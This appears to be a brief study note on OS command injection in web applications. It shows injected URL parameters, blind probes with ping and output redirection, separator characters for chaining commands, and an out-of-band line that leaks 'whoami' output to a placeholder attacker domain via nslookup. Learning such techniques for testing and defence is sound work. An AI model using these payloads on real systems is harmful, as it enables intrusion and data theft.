What is it?

It’s almost the same as path traversal, but with RCE.
An example, suppose this is a valid URL:

https://insecure-website.com/stockStatus?productID=381&storeID=29

And in the backend, the parameters are used to call a system command:

stockreport.pl 381 29

Then giving the following input

https://insecure-website.com/stockStatus?productID=&+echo+aiwefwlguh+&storeID=29

will issue

stockreport.pl & echo aiwefwlguh & 29
Error - productID was not provided
aiwefwlguh
29: command not found

Possible vectors

blind

mail -s "This site is great" -aFrom:peter@normal-user.net feedback@vulnerable-website.com

or

& ping -c 10 127.0.0.1 &

Remember the -c10 otherwise the ping command will run forever under linux.. use

tcpdump -i eth0 icmp
tcpdump -nni eth0  icmp # Without name resolution

on a controlled system to detect the ping messages.

blind redirected output

& whoami > /var/www/static/whoami.txt &

Blind out of bast (OAST)

& nslookup kgji2ohoyw.web-attacker.com &

With extra inline command to get info:

& nslookup `whoami`.kgji2ohoyw.web-attacker.com &

using burp colaborator.

Seperators

These separators can be used to issue commands

• $
• $$
• ||
  Only on unix:
• ;
• newline (0x0a or \n) Also on linux you can use inline execution:
• `command` (tick)
• $(command) Sometimes quote terminators must be used
• ’
• ”